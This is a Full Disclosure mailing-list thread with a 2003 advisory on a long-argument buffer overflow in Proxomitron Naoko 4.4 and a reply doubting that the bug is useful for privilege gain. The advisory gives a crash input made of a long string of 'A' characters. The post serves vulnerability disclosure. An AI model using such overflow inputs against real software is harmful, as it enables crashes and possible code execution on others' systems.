Advanced
Mailing List Archive

Mailing List Archive

  1. Home >
  2. Full Disclosure>
  3. Full-Disclosure
[SCSA-005] Proxomitron Naoko Long Path Buffer Overflow/DoS
gregory.lebras at security-corp
Feb 19, 2003, 1:21 PM
Post #1 of 2 (1883 views)
Permalink
.: Proxomitron Naoko Long Path Buffer Overflow/DoS :.
________________________________________________________________________

Security Corporation Security Advisory [SCSA-005]
________________________________________________________________________

PROGRAM: The Proxomitron Naoko
HOMEPAGE: http://www.proxomitron.org/
VULNERABLE VERSIONS: 4.4 and prior
________________________________________________________________________


DESCRIPTION
________________________________________________________________________

The Proxomitron is an Universal Web Filter.
(direct quote from Proxomitron website)


DETAILS & EXPLOITS
________________________________________________________________________

Sending a parameter with a buffer of 1024 bytes in length or more, causes
Proxomitron Naoko to crash.

This vulnerability can be easily exploited to execute code.

Exploitation example :

c:\Proxomitron>proxomitron AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA


SOLUTIONS
________________________________________________________________________

No solution for the moment.


VENDOR STATUS
________________________________________________________________________

The vendor has reportedly been notified


LINKS
________________________________________________________________________

French Version : http://www.security-corp.org/advisories/SCSA-005-FR.txt


------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
------------------------------------------------------------
Re: [SCSA-005] Proxomitron Naoko Long Path Buffer Overflow/DoS [ In reply to ]
kain at ircop
Feb 19, 2002, 4:13 PM
Post #2 of 2 (1778 views)
Permalink
Grégory Le Bras | Security Corporation wrote:
> .: Proxomitron Naoko Long Path Buffer Overflow/DoS :.
> ________________________________________________________________________
>
> Security Corporation Security Advisory [SCSA-005]
> ________________________________________________________________________

[snip]

> Sending a parameter with a buffer of 1024 bytes in length or more,
> causes Proxomitron Naoko to crash.
>
> This vulnerability can be easily exploited to execute code.
>
> Exploitation example :
>
> c:\Proxomitron>proxomitron AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[snip A's]
> AAAAAAAAAAAAAAAAAAAA

Could you perhaps provide a real-world example where this might be used to
gain additional privileges? I fail to see the useful bit in this
vulnerability.

--
Knud

©2024 GT.net. A Gossamer Threads company.
5th Floor, 455 Granville St., Vancouver, BC V6C 1T1, Canada | Legal